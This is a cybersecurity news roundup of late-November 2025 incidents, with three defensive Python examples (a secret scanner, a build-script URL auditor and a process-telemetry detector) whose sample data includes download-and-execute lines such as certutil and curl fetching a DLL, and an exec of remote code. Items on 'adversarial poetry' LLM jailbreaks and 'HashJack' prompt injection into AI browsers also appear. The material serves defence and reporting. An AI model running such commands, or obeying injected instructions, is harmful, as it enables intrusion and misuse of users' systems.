A weekend news roundup from November 29, 2025, covered several major cyber incidents. The nationwide CodeRED emergency alert system, provided by OnSolve, was hit by an INC Ransom attack, disrupting a critical public safety service. In finance, Wall Street banks were assessing the fallout from a breach at a third-party real estate data firm, exposing ongoing supply chain risks. Additionally, the pro-Ukrainian hacktivist group Ukrainian Cyber Alliance claimed responsibility for a destructive attack on Donbas Post, the Russian-run postal service in occupied Ukraine, reportedly wiping over a thousand systems.

Nov 30, 2025 · 5 min read

Comcast Fined $1.5M by FCC for Vendor's Data Breach

Comcast has agreed to a $1.5 million settlement with the Federal Communications Commission (FCC) following a 2024 data breach at a former vendor. The breach occurred at Financial Business and Consumer Solutions (FBCS), a debt collection agency, and exposed the personal information of nearly 238,000 Comcast customers, including names, addresses, and Social Security numbers. FBCS filed for bankruptcy before disclosing the breach, leaving Comcast to face the regulatory fallout. As part of the settlement, Comcast will implement a stricter vendor security compliance plan, highlighting the growing regulatory expectation for companies to secure their entire supply chain.

Nov 30, 2025 · 5 min read

Global Infrastructure Breach Alert Confirmed as False Alarm

Initial reports on November 30, 2025, of a major security breach impacting global infrastructure were officially confirmed to be a false alarm. The panic was triggered when automated monitoring tools misinterpreted routine, benign system tests as a sophisticated cyberattack, leading to a cascade of incorrect alerts. While no data was stolen and no systems were compromised, the incident has exposed potential weaknesses in cyber-alerting systems and their ability to differentiate between normal administrative actions and genuine threats. The event has prompted calls for improving alert validation processes to maintain public trust.

Nov 30, 2025 · 4 min read

Asahi Confirms Qilin Ransomware Breach Exposed Data of Nearly 2 Million

Japanese beverage giant Asahi Group Holdings has confirmed that a September 2025 ransomware attack by the Qilin group resulted in a data breach affecting 1.914 million individuals. The breach exposed the personal information of customers, employees, and business contacts, and the attack caused significant operational disruptions, including production halts and product shortages. The attackers gained initial access through compromised network equipment and moved laterally to deploy ransomware across Asahi's domestic data centers. While no financial data was stolen, the exposed PII includes names, addresses, phone numbers, and dates of birth.

Nov 29, 2025 · 6 min read

Qilin's "Korean Leaks" Hits 28 Financial Firms via MSP Supply Chain Attack

The Qilin ransomware group has executed a devastating supply-chain attack, dubbed "Korean Leaks," by breaching GJTec, a South Korean managed service provider (MSP). This single point of failure allowed the attackers to compromise at least 28 of the MSP's downstream financial services clients. The campaign, which ran in waves from September to October 2025, resulted in the exfiltration of over 2TB of data. Researchers from Bitdefender have noted potential links to the North Korean state-affiliated group Moonstone Sleet, suggesting a hybrid operation blending financial extortion with geopolitical motives.

Nov 29, 2025 · 6 min read

TryHackMe Apologizes for All-Male Panel After Community Backlash

Cybersecurity training platform TryHackMe issued a public apology on November 28, 2025, after announcing an all-male list of 18 industry helpers for its popular "Advent of Cyber" event. The omission sparked significant backlash from the cybersecurity community regarding the lack of gender diversity and representation. The company acknowledged the mistake was unintentional, stating several female creators had been invited but were unavailable. TryHackMe is now actively working with community members to recruit and onboard women to the panel before the event's launch.

Nov 29, 2025 · 3 min read

Pakistan-linked APT36 Targets Indian Government with New Linux Malware

The Pakistan-based threat group APT36, also known as Transparent Tribe, is conducting an active cyber-espionage campaign against Indian government entities. A CYFIRMA report published on November 29, 2025, details the group's use of a new Python-based malware compiled for Linux systems (ELF format). This development signifies an expansion of APT36's toolkit to target non-Windows environments within sensitive Indian government and strategic sector networks, continuing the group's long-standing focus on intelligence gathering against India.

Nov 29, 2025 · 5 min read

North Korea's Cybercrime is Statecraft, Report Warns

A strategic intelligence report published by CYFIRMA on November 28, 2025, analyzes North Korea's increasing reliance on cybercrime as a core instrument of its statecraft. The report's release is timely, following Russia's 2024 veto that disbanded the UN Panel of Experts responsible for monitoring North Korean sanctions evasion. The analysis details how state-sponsored groups like the Lazarus Group conduct large-scale cyber operations, including cryptocurrency heists and ransomware attacks, to generate revenue that directly funds the nation's weapons programs and sustains the regime.

Nov 29, 2025 · 4 min read

Under Armour Investigates Ransomware Attack, Data Theft Claims

Athletic apparel giant Under Armour is investigating a ransomware attack that has impacted its internal corporate systems. According to a report from November 28, 2025, an unidentified ransomware group has claimed responsibility and alleges it has exfiltrated a large volume of data, including personal records for "millions of individuals." Under Armour has acknowledged the unauthorized access and launched a forensic investigation to determine the scope of the breach and verify the attackers' claims. The incident has caused internal disruptions and poses a significant data privacy risk.

Nov 29, 2025 · 5 min read

DoorDash Discloses Another Breach via Third-Party Vendor

Food delivery service DoorDash disclosed another data breach on November 27, 2025, resulting from a compromise at an unnamed third-party service provider. The incident, reported on November 28, exposed information belonging to both customers and delivery drivers. This breach marks the latest in a series of security incidents for DoorDash involving its supply chain, highlighting persistent vulnerabilities in its network of external vendors and raising concerns about the security of its platform.

Nov 29, 2025 · 5 min read

Oracle Cloud Misconfiguration Exposes Customer Data

Oracle has reported a data breach stemming from misconfigured resources within its own Oracle Cloud Infrastructure (OCI). The incident, first noted on November 13 and analyzed in a report on November 28, 2025, allowed external, unauthorized access to a portion of its cloud environment where customer data was stored. While the full scope and specific customers affected have not been detailed, the breach highlights the significant security challenges of managing large-scale cloud environments, demonstrating that even major cloud providers are susceptible to internal configuration errors.

Nov 29, 2025 · 4 min read

MaaS Provider TAG-150 Distributes Modular Loader and RAT

A Malware-as-a-Service (MaaS) provider, tracked as TAG-150, has been identified operating a campaign active since at least March 2025. According to a threat intelligence report from November 29, 2025, the group is distributing a modular loader that delivers a Remote Access Trojan (RAT). The operation is focused on information theft and leverages user interaction and living-off-the-land techniques to compromise systems. The campaign highlights the ongoing threat from the MaaS ecosystem, which provides cybercriminals with ready-made tools to conduct attacks.

Nov 29, 2025 · 4 min read

French Football Federation Data Breach Exposes Player Info Via Single Compromised Account

The French Football Federation (FFF) announced a significant data breach on November 28, 2025, after an attacker gained access to a centralized administrative software platform using a single compromised user account. The breach exposed the personally identifiable information (PII) of a large number of its 2.3 million members, including names, contact details, and birth dates. The attackers did not exploit a software vulnerability but rather leveraged stolen credentials to gain administrative control. In response, the FFF disabled the account, forced a password reset for all users, and notified both the French data protection authority (CNIL) and the national cybersecurity agency (ANSSI). This incident highlights the critical risk posed by credential compromise and the trend of cyberattacks targeting sports organizations.

Nov 28, 2025 · 6 min read

IT Professional Jailed for 7 Years in Australia for 'Evil Twin' Wi-Fi Attacks on Flights

An Australian IT professional, Michael Clapsis, has been sentenced to seven years and four months in prison for conducting sophisticated 'evil twin' Wi-Fi attacks. Using a Wi-Fi Pineapple device, he created rogue Wi-Fi hotspots at airports and on flights to trick travelers into entering their credentials into a phishing portal. Clapsis then used this access to infiltrate the online accounts of multiple women, stealing thousands of private images and videos. The Australian Federal Police (AFP) investigation began after airline staff reported a suspicious network. Clapsis also attempted to obstruct the investigation by deleting evidence and abusing his IT privileges at work to spy on meetings between his employer and the AFP.

Nov 28, 2025 · 5 min read

Massive Scan of Public GitLab Repositories Uncovers Over 17,000 Live Secrets

A security engineer, Luke Marshall, conducted a large-scale scan of all 5.6 million public repositories on GitLab Cloud, uncovering 17,430 verified, live secrets. The exposed credentials include thousands of API keys and access tokens for over 2,800 unique domains, with Google Cloud Platform (GCP) keys being the most common. The scan, performed using the open-source tool TruffleHog, highlights the pervasive issue of developers hardcoding secrets in public code. Alarmingly, 406 valid GitLab access tokens were found within GitLab's own repositories. The research also uncovered 'zombie secrets' that have remained valid for over a decade, posing a long-term risk. Marshall's responsible disclosure efforts led to multiple bug bounty payouts.

Nov 28, 2025 · 6 min read
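
The GitLab sweep above rests on two steps: pattern-matching candidate secrets, then verifying each one against its issuer so that only live credentials count. The following is an added illustration of that pipeline, not Luke Marshall's code or TruffleHog itself. The prefix regexes are the publicly documented formats for a handful of token types (not an exhaustive list), the sample file contents are constructed placeholders, and the verifier is an offline stub standing in for the API call a real scanner would make.

```python
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Illustrative prefix patterns for a few credential types. Assumption: the
# prefixes are the publicly documented ones, but this is not an exhaustive list.
PATTERNS = {
    "gcp_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "gitlab_pat": re.compile(r"\bglpat-[0-9A-Za-z_\-]{20}\b"),
    "aws_access_key": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[0-9A-Za-z]{36}\b"),
    # Catch-all for `password = "..."`-style assignments; group 1 is the value.
    "generic_assignment": re.compile(
        r"""(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*['"]([^'"\s]{16,})['"]"""
    ),
}


def shannon_entropy(s: str) -> float:
    """Bits per character; placeholders like 'xxxxxxxx' score near 0."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


@dataclass
class Finding:
    kind: str
    value: str
    line_no: int
    entropy: float
    verified: Optional[bool] = None  # None = not yet checked against the issuer


def scan_text(text: str, min_entropy: float = 3.0) -> list:
    """Return candidate secrets found in `text`, in line order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for kind, pat in PATTERNS.items():
            for m in pat.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                ent = shannon_entropy(value)
                # Only the catch-all pattern needs the entropy gate; the fixed
                # prefixes are already specific enough on their own.
                if kind == "generic_assignment" and ent < min_entropy:
                    continue
                findings.append(Finding(kind, value, line_no, round(ent, 2)))
    return findings


def verify_findings(findings, verifier):
    """`verifier(kind, value)` returns True/False/None. This is where a real
    scanner calls the issuing API (the step that separates a 'candidate' from
    a 'verified, live' secret). Assumption: supplied by the caller."""
    for f in findings:
        f.verified = verifier(f.kind, f.value)
    return findings


# Constructed sample; none of these values is a real credential. The AWS key
# is the well-known documentation placeholder AKIAIOSFODNN7EXAMPLE.
SAMPLE_SOURCE = """\
# settings.py
GOOGLE_MAPS_KEY = "AIzaSyD1234567890abcdefghijklmnopqrstuv"
CI_TOKEN = "glpat-abcdefghij0123456789"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
password = "correct-horse-battery-staple"
secret = "xxxxxxxxxxxxxxxxxxxx"
"""


def offline_stub_verifier(kind: str, value: str) -> bool:
    # Stub: pretend only the GitLab token is still live. A real verifier would,
    # for example, GET /api/v4/user with the token and return True on HTTP 200.
    return kind == "gitlab_pat"


if __name__ == "__main__":
    for f in verify_findings(scan_text(SAMPLE_SOURCE), offline_stub_verifier):
        print(f"line {f.line_no}: {f.kind} entropy={f.entropy} live={f.verified}")
```

The entropy gate only applies to the catch-all assignment pattern: the placeholder `secret = "xxxx..."` is dropped, while the passphrase on the line above it is kept for verification. Fixed-prefix tokens skip the gate because the prefix itself is the signal.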

Legacy Python Scripts Create Dormant Supply Chain Risk via Abandoned Domain

Security researchers at ReversingLabs have identified a long-dormant supply chain vulnerability within the Python ecosystem affecting packages that use the legacy 'zc.buildout' tool. Outdated bootstrap scripts (`bootstrap.py`) found in several PyPI packages contain hardcoded references to an abandoned domain, `python-distribute.org`. This domain, once used for a fork of the Setuptools project, is now for sale. An attacker could purchase the domain, host malicious code, and automatically compromise any developer or build system that runs one of these legacy scripts. This creates a direct vector for malware injection, exposing an unknown number of projects to a decade-old risk.

Nov 28, 2025 · 6 min read
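
The risk ReversingLabs describes is a build script that fetches code from a host nobody controls anymore and executes it. The check a maintainer wants is a scan of bootstrap and build scripts for download URLs, with any abandoned host failing outright and any non-allow-listed host that feeds straight into `exec` failing as well. This is an added example, not ReversingLabs' tooling; the trusted-host list is an assumption, the `python-distribute.org` entry comes from the summary above, and the sample script text is constructed in the style of an old `bootstrap.py`.

```python
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")

# Assumption: the only hosts a Python build is allowed to fetch code from.
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org", "bootstrap.pypa.io"}

# Host named above as abandoned and for sale; any reference is a hard fail.
KNOWN_ABANDONED = {"python-distribute.org"}

# Calls that turn whatever was fetched straight into executed code.
EXEC_RE = re.compile(r"\bexec\s*\(|\bsubprocess\.|\bos\.system\(")


def host_verdict(url: str) -> str:
    """'abandoned' (including subdomains), 'trusted', or 'unknown'."""
    host = (urlsplit(url).hostname or "").lower()
    for bad in KNOWN_ABANDONED:
        if host == bad or host.endswith("." + bad):
            return "abandoned"
    return "trusted" if host in TRUSTED_HOSTS else "unknown"


def audit_script(text: str) -> list:
    """Every URL in `text`, its host verdict, and whether the same line
    executes what it fetches."""
    report = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            report.append({
                "line": line_no,
                "url": url,
                "host": host_verdict(url),
                "executes_fetched_code": bool(EXEC_RE.search(line)),
            })
    return report


def build_is_safe(report) -> bool:
    """Fail closed: an abandoned host anywhere, or a non-trusted host whose
    content is executed, blocks the build."""
    return not any(
        r["host"] == "abandoned"
        or (r["host"] != "trusted" and r["executes_fetched_code"])
        for r in report
    )


# Constructed excerpt in the style of a legacy zc.buildout bootstrap.py.
SAMPLE_BOOTSTRAP = """\
import urllib2
exec(urllib2.urlopen('http://python-distribute.org/distribute_setup.py').read())
index = urllib2.urlopen("https://pypi.org/simple/zc.buildout/").read()
mirror = "https://mirror.example.net/distribute-0.6.49.tar.gz"
"""

if __name__ == "__main__":
    report = audit_script(SAMPLE_BOOTSTRAP)
    for r in report:
        print(f"line {r['line']}: {r['host']:9} exec={r['executes_fetched_code']} {r['url']}")
    print("build allowed:", build_is_safe(report))
```

Run this over every `bootstrap.py`, `setup.py` and CI script in a repository before trusting a build, and keep `KNOWN_ABANDONED` fed from your own domain-expiry monitoring: the domain in the summary above is only the one instance that happened to be noticed.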

'Adversarial Poetry' Emerges as Universal Jailbreak for Major LLMs

A new research paper has unveiled a simple yet powerful technique, dubbed 'adversarial poetry,' that can consistently bypass the safety guardrails of major Large Language Models (LLMs). By reformulating harmful prompts into verse, researchers were able to achieve jailbreak success rates up to 18 times higher than with plain text. The technique proved effective as a 'universal single-turn jailbreak' across 25 different AI models, including both proprietary and open-source ones. It successfully generated content related to dangerous topics like CBRN threats and cyber-offenses, revealing a fundamental weakness in current AI alignment strategies that appear overly sensitive to a prompt's style rather than its semantic content.

Nov 28, 2025 · 6 min read

Bloody Wolf APT Shifts Tactics, Using Legitimate RATs to Target Central Asian Governments

The cyber-espionage group 'Bloody Wolf' has expanded its campaign, now targeting government entities in Kyrgyzstan and Uzbekistan. According to research from Group-IB, the APT group has evolved its tactics, moving away from custom malware to a more streamlined, Java-based delivery method. The new attack chain tricks victims into installing the legitimate NetSupport Manager remote administration tool (RAT). By using a widely recognized commercial tool, Bloody Wolf aims to evade detection by blending its malicious activities with normal administrative network traffic, sustaining its long-term espionage and data exfiltration goals.

Nov 28, 2025 · 6 min read

CISA Adds Actively Exploited OpenPLC XSS Flaw to KEV Catalog After Hacktivist Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a cross-site scripting (XSS) vulnerability in OpenPLC ScadaBR, CVE-2021-26829, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on November 28, 2025, follows confirmed reports of active exploitation by the pro-Russian hacktivist group TwoNet. The group was observed using the flaw to deface the HMI of an industrial control system honeypot. The medium-severity vulnerability allows an attacker with access to the system to inject malicious scripts. Federal agencies are now required to patch the flaw by December 19, 2025, to protect against this confirmed threat to ICS/OT environments.

Nov 28, 2025 · 7 min read

Tomiris APT Refines Toolkit, Using Discord and Telegram for C2 in Diplomatic Attacks

The cyber-espionage group 'Tomiris' has upgraded its tactical arsenal in a new wave of attacks targeting diplomatic and government organizations in Russia and Commonwealth of Independent States (CIS) countries. According to a new report from Kaspersky, the APT group is now using public services like Discord and Telegram for command-and-control (C2) communications to better evade detection. The group uses tailored spear-phishing emails to deliver a variety of payloads, including reverse shells and custom backdoors, and deploys specialized 'FileGrabber' malware to steal documents, demonstrating a focus on long-term intelligence gathering.

Nov 28, 2025 · 6 min read

Major Cyberattack Hits Three London Councils, Crippling Public Services

A major cyber incident was declared on November 26, 2025, after a coordinated attack struck the shared IT infrastructure of three London councils: the Royal Borough of Kensington and Chelsea (RBKC), Westminster City Council (WCC), and the London Borough of Hammersmith and Fulham (LBHF). The attack disrupted essential services, including phone lines, for over half a million residents. The councils, which operate under a joint IT arrangement, were forced to activate emergency protocols to maintain critical functions. The UK's National Cyber Security Centre (NCSC) is assisting with the investigation. While the nature of the attack is unconfirmed, experts suspect it is a ransomware incident, potentially targeting a shared managed service provider (MSP), raising fears of a significant data breach involving sensitive citizen information.

Nov 27, 2025 · 6 min read

New 'HashJack' Attack Injects Malicious Prompts into AI Browsers

On November 26, 2025, researchers disclosed a novel indirect prompt injection attack called 'HashJack' that targets AI-enabled web browsers. The technique works by embedding malicious instructions in the fragment portion of a URL (the text following a '#' symbol). Because URL fragments are processed client-side and are not sent to the server, they are invisible to most network security tools like firewalls and web gateways. However, AI assistants integrated into browsers often parse the full URL, including the fragment, to gain context. This allows an attacker to craft a seemingly benign link that, when visited, secretly instructs the user's AI assistant to perform malicious actions, creating a significant new attack surface.

Nov 27, 2025 · 6 min read

Mitsubishi ICS Software Flaw Exposes Credentials in Plaintext

On November 27, 2025, Mitsubishi Electric issued a security advisory for CVE-2025-3784, an information disclosure vulnerability in its GX Works2 industrial control system (ICS) software. The flaw, which affects all versions of the software, involves the storage of credential information in plaintext within project files. An attacker with local access to a computer running the software could extract these credentials and use them to bypass authentication on project files, allowing them to view or modify critical industrial process information. The vulnerability has a CVSS score of 5.5. Mitsubishi is developing a patch and has provided interim mitigation guidance.

Nov 27, 2025 · 6 min read

Critical 10.0 CVSS Flaw in Azure Bastion Allows Full Cloud Takeover

Microsoft has patched a critical authentication bypass vulnerability, CVE-2025-49752, in its Azure Bastion service. The flaw, which scores a perfect 10.0 on the CVSS scale, could allow a remote, unauthenticated attacker to gain administrative control over all virtual machines connected via a vulnerable Bastion host. The vulnerability is a capture-replay flaw, where an attacker can intercept and reuse authentication tokens. All Azure Bastion deployments created before the patch on November 20, 2025, are considered vulnerable, and customers are urged to ensure their instances are updated.

Nov 27, 2025 · 5 min read

Asahi Breweries Crippled by Ransomware Attack, Shipments Plummet to 10% Ahead of Peak Holiday Season

Japan's largest brewer, Asahi Group Holdings Ltd., is facing severe operational paralysis more than a month after a devastating ransomware attack. The attack disabled the company's core order and shipment management system, forcing a regression to manual processes like phone calls and faxes. As a result, shipments are at only 10% of normal levels, a critical blow as the company enters its busiest sales month. The incident, which has also forced Asahi to postpone its Q3 earnings report, highlights the extreme vulnerability of complex supply chains and legacy IT systems to modern cyber threats.

Nov 26, 2025 · 5 min read

CodeRED Emergency Alert System Crippled by 'Inc Ransom' Attack, Disrupting US Public Safety

The OnSolve CodeRED emergency alert system, a critical communication tool for hundreds of U.S. municipalities, has been taken offline following a ransomware attack claimed by the 'Inc Ransom' group. The attack, which began on November 1, 2025, resulted in the encryption of systems and the exfiltration of user data, including names, addresses, and contact information. After failed ransom negotiations, the vendor was forced to decommission the legacy platform, causing significant service disruptions for local governments in numerous states and leaving them unable to issue vital public safety notifications.

Nov 26, 2025 · 6 min read

Geopolitical Shift: Russian and North Korean State Hackers Found Sharing Attack Infrastructure

In a rare and alarming discovery, security researchers have found evidence of operational collaboration between two of the world's most prolific state-sponsored hacking groups: Russia's Gamaredon and North Korea's Lazarus. The evidence centers on a shared command-and-control (C2) server IP address that was used by both groups within days of each other to deliver their respective malware payloads. This convergence of TTPs and infrastructure signals a potential new phase of cyber operations where geopolitical alliances between Moscow and Pyongyang are extending into direct, cooperative attacks, potentially amplifying the threat level for defenders globally.

Nov 26, 2025 · 6 min read

Water Gamayun APT Exploits Novel 'MSC EvilTwin' Windows Flaw in Stealthy Attacks

The Russia-aligned APT group Water Gamayun is actively exploiting a novel vulnerability in the Windows Microsoft Management Console (MMC), tracked as CVE-2025-26633. The attack, analyzed by Zscaler and dubbed 'MSC EvilTwin,' uses a malicious .msc file to proxy code execution through the trusted mmc.exe binary, making it difficult to detect. The multi-stage campaign begins with a malicious download and uses embedded commands to execute hidden PowerShell payloads. This technique allows the attackers to install backdoors and information stealers while evading traditional security measures, showcasing the group's continued sophistication in developing stealthy intrusion methods.

Nov 26, 2025 · 6 min read

CISA Warns of Critical Flaws in Industrial Control Systems, Including CVSS 10.0 Bug

On November 25, 2025, CISA issued seven new advisories for vulnerabilities in Industrial Control Systems (ICS) from multiple vendors, including Rockwell Automation, Opto 22, and Zenitel. The flaws affect equipment used globally in critical manufacturing and communications sectors. The most severe vulnerability, CVE-2025-64130, is a critical OS command injection flaw in Zenitel communications equipment with a CVSS score of 10.0, which could allow for remote code execution. Other advisories cover flaws leading to denial-of-service and information exposure, prompting CISA to urge immediate review and mitigation by asset owners.

Nov 26, 2025 · 6 min read

NVIDIA AI Toolkit and WordPress Plugins Hit with High-Severity Flaws

On November 25, 2025, several new software vulnerabilities were disclosed, including a high-severity Server-Side Request Forgery (SSRF) flaw in NVIDIA's NeMo Agent Toolkit (CVE-2025-33203) used for AI development. This flaw could lead to information disclosure and denial of service. Concurrently, vulnerabilities were found in popular WordPress plugins. The 'Just Highlight' plugin is affected by a stored Cross-Site Scripting (XSS) bug (CVE-2025-13311), while the 'Locker Content' plugin has a sensitive information exposure flaw (CVE-2025-12525) that could allow unauthenticated attackers to bypass content restrictions.

Nov 26, 2025 · 6 min read

Homeland Security Warns Gov't Shutdown and Lapsed Law Cripple U.S. Cyber Defenses

The U.S. House Committee on Homeland Security has issued a stark warning in its latest 'Cyber Threat Snapshot,' stating that the nation's ability to defend against cyber threats is being severely hampered. The report cites a dual crisis: a federal government shutdown that furloughs key cybersecurity personnel, and the lapse of the Cybersecurity Information Sharing Act of 2015. This creates 'dangerous blind spots' at a time of heightened threat activity from nation-state actors like China and Iran, and a surge in attacks against U.S. critical infrastructure.

Nov 25, 2025 · 4 min read

Akira Ransomware Targets M&A Blind Spots, Breaching Firms via Inherited SonicWall Devices

The Akira ransomware group is exploiting security blind spots created during corporate mergers and acquisitions (M&A). According to research by ReliaQuest, Akira affiliates are gaining initial access to acquiring companies by compromising vulnerable SonicWall SSL VPN appliances inherited from smaller, acquired firms. Attackers leverage the fact that the acquiring organizations are often unaware of these unpatched, legacy devices on their new network. Once inside, they use zombie credentials and move laterally, with the time from lateral movement to ransomware deployment averaging less than one hour, highlighting a rapid and effective attack chain.

Nov 25, 2025 · 5 min read

URGENT: CISA Orders 7-Day Patch for Actively Exploited FortiWeb Zero-Day

Fortinet has disclosed a critical OS command injection zero-day vulnerability, CVE-2025-58034, in its FortiWeb Web Application Firewall (WAF) that is being actively exploited in the wild. The flaw allows an authenticated attacker to execute arbitrary commands on the underlying system. In response to observed attacks, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and issued an emergency directive mandating federal agencies apply patches within an accelerated seven-day window, by November 25, 2025. Researchers have detected approximately 2,000 attacks leveraging the flaw and warn it could potentially be chained with a recently disclosed authentication bypass vulnerability (CVE-2025-64446) to achieve unauthenticated remote code execution.

Nov 24, 2025 · 5 min read

Massive NPM Supply Chain Attack Spreads Self-Replicating "Shai-Hulud" Worm

A significant, ongoing supply chain attack is targeting the NPM JavaScript ecosystem, where a self-replicating worm dubbed "Shai-Hulud" has infected over 400 software packages. The attack has a substantial impact on the cryptocurrency sector, compromising at least 10 widely used libraries crucial for the Ethereum Name Service (ENS), including 'content-hash' and 'address-encoder'. The malware functions as a general-purpose credential stealer, exfiltrating secrets like wallet keys from infected developer environments. The scale is vast, with researchers at Wiz observing over 25,000 affected repositories, highlighting a critical threat to developer infrastructure worldwide.

Nov 24, 2025 · 5 min read

FCC Rolls Back ISP Cybersecurity Rules Despite China-Linked Hacking Threats

In a controversial decision, the U.S. Federal Communications Commission (FCC) has rescinded cybersecurity regulations for internet service providers (ISPs). These rules were implemented by the Biden Administration following the discovery that the Chinese state-sponsored hacking group Salt Typhoon had breached major U.S. carriers. The revoked rules mandated minimum security standards and compliance certifications. The FCC claimed the original ruling was based on a "flawed legal analysis," but the move has drawn sharp criticism, with Commissioner Anna M. Gomez stating it leaves the country "less secure" against increasing nation-state threats.

Nov 24, 2025 · 4 min read

Akira Ransomware Gang Hits LG Energy Solution, Claims 1.7TB Data Theft

South Korean battery manufacturing giant LG Energy Solution has confirmed it was the victim of a ransomware attack at one of its overseas facilities. The notorious Akira ransomware gang has claimed responsibility for the breach, alleging on its dark web leak site that it stole 1.7 terabytes of data from the company's network. While LG Energy Solution reports that the affected systems have been restored and its headquarters was not impacted, the incident highlights the continued threat of double-extortion ransomware attacks against the manufacturing sector. The Akira gang has been highly active, often gaining initial access via compromised VPN credentials.

Nov 24, 2025 · 5 min read

New "Autumn Dragon" Espionage Campaign Targets Southeast Asia

A newly identified cyber-espionage campaign named "Autumn Dragon" has been targeting government and media organizations across Southeast Asia since early 2025. The operation, attributed with medium confidence to a China-nexus Advanced Persistent Threat (APT) group, aims to gather intelligence related to the South China Sea. The attackers use spearphishing emails with malicious WinRAR archives that exploit the vulnerability CVE-2025-8088. Upon execution, a dropper script masquerading as a Windows Defender update retrieves and runs additional payloads to establish a foothold for intelligence gathering.

Nov 24, 2025 · 5 min read

ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability

An active intrusion campaign is exploiting a critical remote code execution (RCE) vulnerability, CVE-2025-59287, in Microsoft's Windows Server Update Services (WSUS). Attackers, believed to be Chinese state-sponsored APTs, are leveraging the flaw to gain system-level access and deploy the sophisticated ShadowPad backdoor. The attack chain involves using PowerShell and legitimate system utilities like 'certutil' and 'curl' to download the malware, which is then executed using a DLL sideloading technique for stealth and persistence. The campaign highlights the rapid weaponization of newly disclosed vulnerabilities for espionage purposes.

Nov 24, 2025 · 5 min read
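
Two of the summaries above describe intrusion chains that hide behind signed Windows binaries: the MSC EvilTwin technique, where `mmc.exe` is made to execute a script host from a malicious `.msc` file, and the WSUS chain, where `certutil` and `curl` pull ShadowPad down from a server process. Both leave the same kind of trace in process-creation telemetry, so one set of parent/child and command-line rules covers them. The block below is an added example written by the editor, not Zscaler's or any vendor's detection content. The events are constructed in a Sysmon/4688-like shape, and the list of server-side parent processes is an assumption; the DLL sideloading stage of the WSUS chain is not modelled here.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / Windows 4688 style)."""
    id: int
    parent_image: str  # basename of the parent process
    image: str         # basename of the new process
    cmdline: str


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe", "bitsadmin.exe"}
# Assumption: server-side parents that should never be fetching files from the internet.
SERVER_PARENTS = {"w3wp.exe", "wsusservice.exe"}

URL_RE = re.compile(r"https?://", re.I)
USER_WRITABLE_RE = re.compile(r"\\(users|programdata|temp|appdata)\\", re.I)
ENCODED_PS_RE = re.compile(r"\s-(enc|encodedcommand|e)\s", re.I)


def detect(ev: ProcEvent) -> list:
    """Return the names of every rule the event trips, in rule order."""
    parent, image, cmd = ev.parent_image.lower(), ev.image.lower(), ev.cmdline
    hits = []
    # MSC EvilTwin-style proxy execution: the trusted console spawns a script host.
    if parent == "mmc.exe" and image in SCRIPT_HOSTS:
        hits.append("mmc_spawned_script_host")
        if ENCODED_PS_RE.search(cmd):
            hits.append("encoded_powershell")
    # A console file opened from a user-writable path instead of System32.
    if image == "mmc.exe" and re.search(r"\.msc\b", cmd, re.I) and USER_WRITABLE_RE.search(cmd):
        hits.append("msc_from_user_writable_path")
    # certutil/curl pulling a payload from a URL, as in the WSUS chain.
    if image in DOWNLOADERS and URL_RE.search(cmd):
        hits.append("lolbin_download")
        if parent in SERVER_PARENTS:
            hits.append("download_spawned_by_server_process")
    return hits


def run_detections(events) -> dict:
    """Map event id -> rule hits, omitting events that trip nothing."""
    return {ev.id: hits for ev in events if (hits := detect(ev))}


# Constructed sample telemetry; the IP is from the documentation range 203.0.113.0/24.
SAMPLE_EVENTS = [
    ProcEvent(1, "explorer.exe", "mmc.exe",
              r'"C:\Windows\System32\mmc.exe" C:\Users\alice\Downloads\WindowsUpdate.msc'),
    ProcEvent(2, "mmc.exe", "powershell.exe",
              "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(3, "w3wp.exe", "certutil.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.7/upd.dll C:\Windows\Temp\upd.dll"),
    ProcEvent(4, "cmd.exe", "curl.exe",
              r"curl.exe -s http://203.0.113.7/upd.dll -o C:\ProgramData\upd.dll"),
    # Benign noise that must not alert.
    ProcEvent(5, "explorer.exe", "powershell.exe", "powershell.exe Get-Process"),
    ProcEvent(6, "services.exe", "certutil.exe", "certutil.exe -verify server.cer"),
]

if __name__ == "__main__":
    for event_id, hits in run_detections(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

Events 1 and 2 together are the EvilTwin shape (a console loaded from Downloads, then the console spawning encoded PowerShell); event 3 is the WSUS shape, where the downloader's parent is the web worker rather than a user shell. The benign events show why each rule needs both halves: PowerShell under Explorer and `certutil -verify` without a URL are everyday activity.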

Supply Chain Breaches Escalate Despite Maturing Defenses, Report Finds

A new 2025 report from cybersecurity firm BlueVoyant reveals a troubling trend: despite most organizations maturing their third-party risk management (TPRM) programs, the number of supply chain breaches is escalating. The study found that 97% of surveyed organizations experienced a supplier-related security incident in the past year, a significant jump from 81% in 2024. The report identifies ineffective tool integration and internal organizational silos as key barriers, with the manufacturing sector being particularly hard-hit, averaging 3.8 breaches per organization.

Nov 24, 2025 · 4 min read

Ransomware Attacks Peak on Holidays and Weekends, Exploiting Low Staffing

